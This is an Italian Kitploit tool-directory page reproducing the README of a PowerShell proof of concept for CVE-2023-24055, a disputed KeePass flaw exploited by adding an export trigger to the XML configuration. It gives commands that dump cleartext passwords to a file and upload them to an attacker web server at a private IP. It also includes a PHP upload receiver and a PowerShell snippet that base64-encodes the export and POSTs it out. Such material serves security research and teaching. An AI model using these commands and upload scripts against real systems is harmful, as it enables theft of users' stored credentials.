Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-24055 — CVE-2023-24055 POC scritto in PowerShell. | Kitploit
Strumenti/GitHubGitHub/yosef0x01/cve-2023-24055
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitEsfiltrazione DatiApprendimento e Formazione
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

CVE-2023-24055 POC scritto in PowerShell.

Vedi Repository
143 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

alt text

Dichiarazione di non responsabilità

Questo script è solo a scopo educativo e dimostrativo. L'autore non approva né incoraggia l'uso di questo script per attività criminali o dannose e dovrebbe essere utilizzato solo dove esplicitamente consentito con la dovuta autorizzazione.

Questo script deve essere usato con cautela, poiché modificherà il file di configurazione di KeePass ed eliminerà eventuali trigger precedentemente configurati. L'uso di questo script può causare comportamenti imprevisti e potenzialmente danneggiare l'applicazione KeePass. Utilizzalo a tuo rischio.

Introduzione

Questo script dimostra la vulnerabilità ** DISPUTED ** (CVE-2023-24055) di KeePass fino alla versione 2.53 (in un'installazione predefinita), in quanto consente a un utente malintenzionato con accesso in scrittura al file di configurazione XML di ottenere le password in chiaro aggiungendo un trigger di esportazione. Si noti che la posizione del fornitore è che il database delle password non è progettato per essere sicuro contro un utente malintenzionato che ha quel livello di accesso al PC locale.

Riferimenti:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

Istruzioni

Per usare questo script, eseguilo in PowerShell e fornisci i parametri necessari. I parametri obbligatori sono:

  • -filename: Il percorso completo e il nome del file in cui esportare le password.

I parametri opzionali sono:

  • -uploadURL: Questa opzione specifica che i dati devono essere caricati all'URL specificato.
  • -url: L'URL a cui caricare i dati.

Esempio di utilizzo

Esporta le password in chiaro:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

Esporta le password in chiaro e carica l'esportazione sul server web:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

Aiuto dettagliato:

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

Esempio di script PHP per caricare file sul server web

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

Esempio di script PowerShell per testare il caricamento PHP

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

Crediti

  • Script inizialmente basato sul codice trovato in https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • L'idea di esfiltrare l'esportazione è attribuita a https://github.com/alt3kx/CVE-2023-24055_PoC.
Scarica lo strumento